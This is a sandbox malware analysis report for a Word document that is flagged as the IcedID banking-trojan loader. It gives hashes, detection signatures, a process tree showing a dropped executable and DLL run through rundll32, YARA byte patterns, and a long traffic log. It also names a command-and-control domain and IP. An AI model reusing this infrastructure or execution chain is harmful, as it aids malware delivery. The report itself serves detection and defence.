Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
courtesyautomotivedoc08.11.doc

Overview

General Information

Sample Name:courtesyautomotivedoc08.11.doc
Analysis ID:682567
MD5:00e8f42e0462d4abf8a6bb6960abe5b5
SHA1:0235d1eb73c161a7fcc944d99730d8ed0200fb8e
SHA256:3af042bd0b5a186b98920cf0b7066344609d6d6deb163ffb0b60325dcca66e44
Tags:docIcedID
Infos:

Detection

IcedID
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for dropped file
Yara detected IcedID
Submitted sample is a known malware sample
Office process drops PE file
Machine Learning detection for sample
Document contains an embedded VBA macro with suspicious strings
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Document exploit detected (process start blacklist hit)
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Yara signature match
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 2032 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • r9093.tmp.exe (PID: 1488 cmdline: "C:\Users\user\AppData\Local\Temp\r9093.tmp.exe" "C:\Users\user\AppData\Local\Temp\y875E.tmp.dll",#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
      • rundll32.exe (PID: 2480 cmdline: "C:\Users\user\AppData\Local\Temp\r9093.tmp.exe" "C:\Users\user\AppData\Local\Temp\y875E.tmp.dll",#1 MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup
{"Campaign ID": 3570055661, "C2 url": "alexbionka.com"}
SourceRuleDescriptionAuthorStrings
00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_IcedID_0b62e783unknownunknown
  • 0x876:$a: 89 44 95 E0 83 E0 07 8A C8 42 8B 44 85 E0 D3 C8 FF C0 42 89 44
00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_IcedID_91562d18unknownunknown
  • 0x1bc4:$a: 44 8B 4C 19 2C 4C 03 D6 74 1C 4D 85 C0 74 17 4D 85 C9 74 12 41
00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_IcedID_48029e37unknownunknown
  • 0x1190:$a: 48 C1 E3 10 0F 31 48 C1 E2 20 48 0B C2 0F B7 C8 48 0B D9 8B CB 83 E1
00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmpWindows_Trojan_IcedID_11d24d35unknownunknown
  • 0x3d0:$a2: loader_dll_64.dll
00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_IcedID_6Yara detected IcedIDJoe Security
    Click to see the 7 entries
    SourceRuleDescriptionAuthorStrings
    5.2.rundll32.exe.2fab68.0.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
    • 0x1bd0:$internal_name: loader_dll_64.dll
    • 0x1f08:$string6: WINHTTP.dll
    • 0x1bf4:$string7: DllRegisterServer
    • 0x1c06:$string8: PluginInit
    5.2.rundll32.exe.2fab68.0.unpackWindows_Trojan_IcedID_11d24d35unknownunknown
    • 0x1bd0:$a2: loader_dll_64.dll
    5.2.rundll32.exe.2fab68.0.unpackWindows_Trojan_IcedID_91562d18unknownunknown
    • 0x13c4:$a: 44 8B 4C 19 2C 4C 03 D6 74 1C 4D 85 C0 74 17 4D 85 C9 74 12 41
    5.2.rundll32.exe.2fab68.0.unpackWindows_Trojan_IcedID_48029e37unknownunknown
    • 0x990:$a: 48 C1 E3 10 0F 31 48 C1 E2 20 48 0B C2 0F B7 C8 48 0B D9 8B CB 83 E1
    5.2.rundll32.exe.180000000.1.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
    • 0x27d0:$internal_name: loader_dll_64.dll
    • 0x3198:$string0: _gat=
    • 0x3048:$string1: _ga=
    • 0x30a0:$string2: _gid=
    • 0x3118:$string3: _u=
    • 0x303a:$string4: _io=
    • 0x3054:$string5: GetAdaptersInfo
    • 0x2b08:$string6: WINHTTP.dll
    • 0x27f4:$string7: DllRegisterServer
    • 0x2806:$string8: PluginInit
    • 0x3134:$string9: POST
    Click to see the 14 entries
    No Sigma rule has matched
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: courtesyautomotivedoc08.11.docVirustotal: Detection: 26%Perma Link
    Source: courtesyautomotivedoc08.11.docReversingLabs: Detection: 17%
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n14[1].dllAvira: detection malicious, Label: HEUR/AGEN.1251556
    Source: C:\Users\user\AppData\Local\Temp\y875E.tmp.dllAvira: detection malicious, Label: HEUR/AGEN.1251556
    Source: Yara matchFile source: 5.2.rundll32.exe.2fab68.0.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2480, type: MEMORYSTR
    Source: Yara matchFile source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE
    Source: courtesyautomotivedoc08.11.docJoe Sandbox ML: detected
    Source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: IcedID {"Campaign ID": 3570055661, "C2 url": "alexbionka.com"}
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF7532CDA CryptCreateHash,
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF7532CCA CryptCreateHash,
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF7532CF7 CryptCreateHash,CryptAcquireContextW,
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF7532CCA CryptCreateHash,
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: rundll32.pdb source: r9093.tmp.exe, r9093.tmp.exe, 00000004.00000000.924895395.0000000000761000.00000020.00000001.01000000.00000003.sdmp, r9093.tmp.exe, 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, r9093.tmp.exe.1.dr

    Software Vulnerabilities

    barindex
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: loader_p3_dll_64_n3_crypt_x64_asm_clone_n14[1].dll.1.drJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n14[1].dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\y875E.tmp.dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Users\user\AppData\Local\Temp\r9093.tmp.exe
    Source: global trafficDNS query: name: alexbionka.com
    Source: global trafficDNS query: name: alexbionka.com
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
